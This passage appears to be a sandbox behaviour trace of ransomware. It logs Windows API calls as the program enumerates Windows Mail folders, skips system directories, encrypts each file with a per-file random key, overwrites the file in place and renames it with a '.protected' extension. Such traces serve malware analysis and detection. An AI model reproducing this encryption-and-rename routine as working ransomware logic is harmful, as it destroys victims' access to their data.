dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0094.184] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\account{1CD43F3B-668B-4CA8-B816-34F74122EC0F}.oeaccount" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\account{1cd43f3b-668b-4ca8-b816-34f74122ec0f}.oeaccount"), dwDesiredAccess=0xc0000000, 
dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0094.185] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\account{1CD43F3B-668B-4CA8-B816-34F74122EC0F}.oeaccount") returned 113 [0094.185] StrStrW (lpFirst="account{1CD43F3B-668B-4CA8-B816-34F74122EC0F}.oeaccount", lpSrch=".txt") returned 0x0 [0094.185] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\account{1CD43F3B-668B-4CA8-B816-34F74122EC0F}.oeaccount") returned 113 [0094.185] StrStrW (lpFirst="account{1CD43F3B-668B-4CA8-B816-34F74122EC0F}.oeaccount", lpSrch=".rar") returned 0x0 [0094.185] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\account{1CD43F3B-668B-4CA8-B816-34F74122EC0F}.oeaccount") returned 113 [0094.185] StrStrW (lpFirst="account{1CD43F3B-668B-4CA8-B816-34F74122EC0F}.oeaccount", lpSrch=".zip") returned 0x0 [0094.185] ReadFile (in: hFile=0x14c, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295ea24*=0x2a0, lpOverlapped=0x0) returned 1 [0094.202] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xfffffd60, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0094.202] WriteFile (in: hFile=0x14c, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x2a0, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295ea24*=0x2a0, lpOverlapped=0x0) returned 1 [0094.202] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.202] WriteFile (in: hFile=0x14c, lpBuffer=0x295e9fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x295e9fc*, lpNumberOfBytesWritten=0x295ea24*=0x4, lpOverlapped=0x0) returned 1 
[0094.203] WriteFile (in: hFile=0x14c, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ea24*=0x30, lpOverlapped=0x0) returned 1 [0094.203] CloseHandle (hObject=0x14c) returned 1 [0094.203] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\account{1CD43F3B-668B-4CA8-B816-34F74122EC0F}.oeaccount.protected") returned 123 [0094.203] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\account{1CD43F3B-668B-4CA8-B816-34F74122EC0F}.oeaccount" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\account{1cd43f3b-668b-4ca8-b816-34f74122ec0f}.oeaccount"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\account{1CD43F3B-668B-4CA8-B816-34F74122EC0F}.oeaccount.protected" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\account{1cd43f3b-668b-4ca8-b816-34f74122ec0f}.oeaccount.protected")) returned 1 [0094.204] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0094.204] lstrcmpiW (lpString1="account{AF0DB737-2EF9-4633-BF5E-1A6761ED1577}.oeaccount", lpString2="Windows") returned -1 [0094.204] lstrcmpiW (lpString1="account{AF0DB737-2EF9-4633-BF5E-1A6761ED1577}.oeaccount", lpString2="Program Files") returned -1 [0094.204] lstrcmpiW (lpString1="account{AF0DB737-2EF9-4633-BF5E-1A6761ED1577}.oeaccount", lpString2="Program Files (x86)") returned -1 [0094.204] lstrcmpiW (lpString1="account{AF0DB737-2EF9-4633-BF5E-1A6761ED1577}.oeaccount", lpString2="$Recycle.bin") returned 1 [0094.204] lstrcmpiW (lpString1="account{AF0DB737-2EF9-4633-BF5E-1A6761ED1577}.oeaccount", lpString2="System Volume Information") returned -1 [0094.204] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: 
pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\account{AF0DB737-2EF9-4633-BF5E-1A6761ED1577}.oeaccount") returned 113 [0094.204] StrStrIW (lpFirst="account{AF0DB737-2EF9-4633-BF5E-1A6761ED1577}.oeaccount", lpSrch=".protected") returned 0x0 [0094.204] lstrcmpW (lpString1="account{AF0DB737-2EF9-4633-BF5E-1A6761ED1577}.oeaccount", lpString2="RESTORE_FILES.txt") returned -1 [0094.204] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0094.204] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0094.204] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\account{AF0DB737-2EF9-4633-BF5E-1A6761ED1577}.oeaccount" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\account{af0db737-2ef9-4633-bf5e-1a6761ed1577}.oeaccount"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0094.204] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\account{AF0DB737-2EF9-4633-BF5E-1A6761ED1577}.oeaccount") returned 113 [0094.204] StrStrW (lpFirst="account{AF0DB737-2EF9-4633-BF5E-1A6761ED1577}.oeaccount", lpSrch=".txt") returned 0x0 [0094.204] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\account{AF0DB737-2EF9-4633-BF5E-1A6761ED1577}.oeaccount") returned 113 [0094.205] StrStrW (lpFirst="account{AF0DB737-2EF9-4633-BF5E-1A6761ED1577}.oeaccount", lpSrch=".rar") returned 0x0 [0094.205] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\account{AF0DB737-2EF9-4633-BF5E-1A6761ED1577}.oeaccount") returned 113 [0094.205] StrStrW 
(lpFirst="account{AF0DB737-2EF9-4633-BF5E-1A6761ED1577}.oeaccount", lpSrch=".zip") returned 0x0 [0094.214] ReadFile (in: hFile=0x14c, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295ea24*=0x6c8, lpOverlapped=0x0) returned 1 [0094.225] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xfffff938, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0094.225] WriteFile (in: hFile=0x14c, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x6c8, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295ea24*=0x6c8, lpOverlapped=0x0) returned 1 [0094.226] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.226] WriteFile (in: hFile=0x14c, lpBuffer=0x295e9fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x295e9fc*, lpNumberOfBytesWritten=0x295ea24*=0x4, lpOverlapped=0x0) returned 1 [0094.226] WriteFile (in: hFile=0x14c, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ea24*=0x30, lpOverlapped=0x0) returned 1 [0094.226] CloseHandle (hObject=0x14c) returned 1 [0094.226] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\account{AF0DB737-2EF9-4633-BF5E-1A6761ED1577}.oeaccount.protected") returned 123 [0094.226] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\account{AF0DB737-2EF9-4633-BF5E-1A6761ED1577}.oeaccount" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\account{af0db737-2ef9-4633-bf5e-1a6761ed1577}.oeaccount"), 
lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\account{AF0DB737-2EF9-4633-BF5E-1A6761ED1577}.oeaccount.protected" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\account{af0db737-2ef9-4633-bf5e-1a6761ed1577}.oeaccount.protected")) returned 1 [0094.227] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0094.227] lstrcmpiW (lpString1="Backup", lpString2="Windows") returned -1 [0094.227] lstrcmpiW (lpString1="Backup", lpString2="Program Files") returned -1 [0094.227] lstrcmpiW (lpString1="Backup", lpString2="Program Files (x86)") returned -1 [0094.227] lstrcmpiW (lpString1="Backup", lpString2="$Recycle.bin") returned 1 [0094.227] lstrcmpiW (lpString1="Backup", lpString2="System Volume Information") returned -1 [0094.227] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Backup") returned 64 [0094.227] lstrcmpW (lpString1="Backup", lpString2=".") returned 1 [0094.227] lstrcmpW (lpString1="Backup", lpString2="..") returned 1 [0094.227] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\*") returned 66 [0094.227] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\*", lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0x47ba90 [0094.227] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0094.227] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0094.227] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0094.227] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0094.227] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0094.227] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, 
pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\.") returned 66 [0094.227] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0094.227] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0094.227] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0094.227] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0094.227] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0094.227] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0094.227] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0094.228] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\..") returned 67 [0094.228] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0094.228] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0094.228] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0094.228] lstrcmpiW (lpString1="new", lpString2="Windows") returned -1 [0094.228] lstrcmpiW (lpString1="new", lpString2="Program Files") returned -1 [0094.228] lstrcmpiW (lpString1="new", lpString2="Program Files (x86)") returned -1 [0094.228] lstrcmpiW (lpString1="new", lpString2="$Recycle.bin") returned 1 [0094.228] lstrcmpiW (lpString1="new", lpString2="System Volume Information") returned -1 [0094.228] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\new") returned 68 [0094.228] lstrcmpW (lpString1="new", lpString2=".") returned 1 [0094.228] lstrcmpW (lpString1="new", lpString2="..") returned 1 [0094.228] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows 
Mail\\Backup\\new\\*") returned 70 [0094.228] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\new\\*", lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0x47bad0 [0094.229] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0094.229] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0094.230] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0094.230] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0094.230] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0094.230] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\new\\.") returned 70 [0094.230] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0094.230] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0094.230] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0094.230] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0094.230] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0094.230] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0094.230] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0094.230] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\new\\..") returned 71 [0094.230] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0094.230] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0094.230] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0094.230] lstrcmpiW (lpString1="edb00001.log", lpString2="Windows") returned -1 [0094.230] lstrcmpiW (lpString1="edb00001.log", lpString2="Program Files") returned -1 
[0094.230] lstrcmpiW (lpString1="edb00001.log", lpString2="Program Files (x86)") returned -1 [0094.230] lstrcmpiW (lpString1="edb00001.log", lpString2="$Recycle.bin") returned 1 [0094.230] lstrcmpiW (lpString1="edb00001.log", lpString2="System Volume Information") returned -1 [0094.230] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\new\\edb00001.log") returned 81 [0094.230] StrStrIW (lpFirst="edb00001.log", lpSrch=".protected") returned 0x0 [0094.230] lstrcmpW (lpString1="edb00001.log", lpString2="RESTORE_FILES.txt") returned -1 [0094.230] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0094.230] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0094.230] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\new\\edb00001.log" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\backup\\new\\edb00001.log"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0094.231] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\new\\edb00001.log") returned 81 [0094.231] StrStrW (lpFirst="edb00001.log", lpSrch=".txt") returned 0x0 [0094.231] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\new\\edb00001.log") returned 81 [0094.231] StrStrW (lpFirst="edb00001.log", lpSrch=".rar") returned 0x0 [0094.231] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\new\\edb00001.log") returned 81 [0094.231] StrStrW (lpFirst="edb00001.log", lpSrch=".zip") returned 0x0 
[0094.231] ReadFile (in: hFile=0x154, lpBuffer=0x503c40, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x503c40*, lpNumberOfBytesRead=0x295e544*=0x2800, lpOverlapped=0x0) returned 1 [0094.250] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0094.250] WriteFile (in: hFile=0x154, lpBuffer=0x503c40*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x503c40*, lpNumberOfBytesWritten=0x295e544*=0x2800, lpOverlapped=0x0) returned 1 [0094.250] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.250] WriteFile (in: hFile=0x154, lpBuffer=0x295e51c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x295e51c*, lpNumberOfBytesWritten=0x295e544*=0x4, lpOverlapped=0x0) returned 1 [0094.251] WriteFile (in: hFile=0x154, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e544*=0x30, lpOverlapped=0x0) returned 1 [0094.251] CloseHandle (hObject=0x154) returned 1 [0094.261] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\new\\edb00001.log.protected") returned 91 [0094.261] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\new\\edb00001.log" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\backup\\new\\edb00001.log"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\new\\edb00001.log.protected" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\backup\\new\\edb00001.log.protected")) returned 1 
[0094.262] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0094.262] lstrcmpiW (lpString1="WindowsMail.MSMessageStore", lpString2="Windows") returned 1 [0094.262] lstrcmpiW (lpString1="WindowsMail.MSMessageStore", lpString2="Program Files") returned 1 [0094.262] lstrcmpiW (lpString1="WindowsMail.MSMessageStore", lpString2="Program Files (x86)") returned 1 [0094.262] lstrcmpiW (lpString1="WindowsMail.MSMessageStore", lpString2="$Recycle.bin") returned 1 [0094.262] lstrcmpiW (lpString1="WindowsMail.MSMessageStore", lpString2="System Volume Information") returned 1 [0094.262] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\new\\WindowsMail.MSMessageStore") returned 95 [0094.262] StrStrIW (lpFirst="WindowsMail.MSMessageStore", lpSrch=".protected") returned 0x0 [0094.262] lstrcmpW (lpString1="WindowsMail.MSMessageStore", lpString2="RESTORE_FILES.txt") returned 1 [0094.262] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0094.262] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0094.262] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\new\\WindowsMail.MSMessageStore" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\backup\\new\\windowsmail.msmessagestore"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0094.262] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\new\\WindowsMail.MSMessageStore") returned 95 [0094.262] StrStrW (lpFirst="WindowsMail.MSMessageStore", 
lpSrch=".txt") returned 0x0 [0094.262] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\new\\WindowsMail.MSMessageStore") returned 95 [0094.262] StrStrW (lpFirst="WindowsMail.MSMessageStore", lpSrch=".rar") returned 0x0 [0094.262] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\new\\WindowsMail.MSMessageStore") returned 95 [0094.262] StrStrW (lpFirst="WindowsMail.MSMessageStore", lpSrch=".zip") returned 0x0 [0094.262] ReadFile (in: hFile=0x154, lpBuffer=0x503c40, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x503c40*, lpNumberOfBytesRead=0x295e544*=0x2800, lpOverlapped=0x0) returned 1 [0094.285] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0094.285] WriteFile (in: hFile=0x154, lpBuffer=0x503c40*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x503c40*, lpNumberOfBytesWritten=0x295e544*=0x2800, lpOverlapped=0x0) returned 1 [0094.286] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.286] WriteFile (in: hFile=0x154, lpBuffer=0x295e51c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x295e51c*, lpNumberOfBytesWritten=0x295e544*=0x4, lpOverlapped=0x0) returned 1 [0094.288] WriteFile (in: hFile=0x154, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e544*=0x30, lpOverlapped=0x0) returned 1 [0094.288] CloseHandle (hObject=0x154) returned 1 [0094.289] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows 
Mail\\Backup\\new\\WindowsMail.MSMessageStore.protected") returned 105 [0094.289] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\new\\WindowsMail.MSMessageStore" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\backup\\new\\windowsmail.msmessagestore"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\new\\WindowsMail.MSMessageStore.protected" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\backup\\new\\windowsmail.msmessagestore.protected")) returned 1 [0094.289] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0094.289] lstrcmpiW (lpString1="WindowsMail.pat", lpString2="Windows") returned 1 [0094.290] lstrcmpiW (lpString1="WindowsMail.pat", lpString2="Program Files") returned 1 [0094.290] lstrcmpiW (lpString1="WindowsMail.pat", lpString2="Program Files (x86)") returned 1 [0094.290] lstrcmpiW (lpString1="WindowsMail.pat", lpString2="$Recycle.bin") returned 1 [0094.290] lstrcmpiW (lpString1="WindowsMail.pat", lpString2="System Volume Information") returned 1 [0094.290] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\new\\WindowsMail.pat") returned 84 [0094.290] StrStrIW (lpFirst="WindowsMail.pat", lpSrch=".protected") returned 0x0 [0094.290] lstrcmpW (lpString1="WindowsMail.pat", lpString2="RESTORE_FILES.txt") returned 1 [0094.290] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0094.290] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0094.290] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows 
Mail\\Backup\\new\\WindowsMail.pat" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\backup\\new\\windowsmail.pat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0094.290] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\new\\WindowsMail.pat") returned 84 [0094.290] StrStrW (lpFirst="WindowsMail.pat", lpSrch=".txt") returned 0x0 [0094.290] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\new\\WindowsMail.pat") returned 84 [0094.291] StrStrW (lpFirst="WindowsMail.pat", lpSrch=".rar") returned 0x0 [0094.291] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\new\\WindowsMail.pat") returned 84 [0094.291] StrStrW (lpFirst="WindowsMail.pat", lpSrch=".zip") returned 0x0 [0094.291] ReadFile (in: hFile=0x154, lpBuffer=0x503c40, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x503c40*, lpNumberOfBytesRead=0x295e544*=0x2800, lpOverlapped=0x0) returned 1 [0094.293] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0094.293] WriteFile (in: hFile=0x154, lpBuffer=0x503c40*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x503c40*, lpNumberOfBytesWritten=0x295e544*=0x2800, lpOverlapped=0x0) returned 1 [0094.293] SetFilePointerEx (in: hFile=0x154, 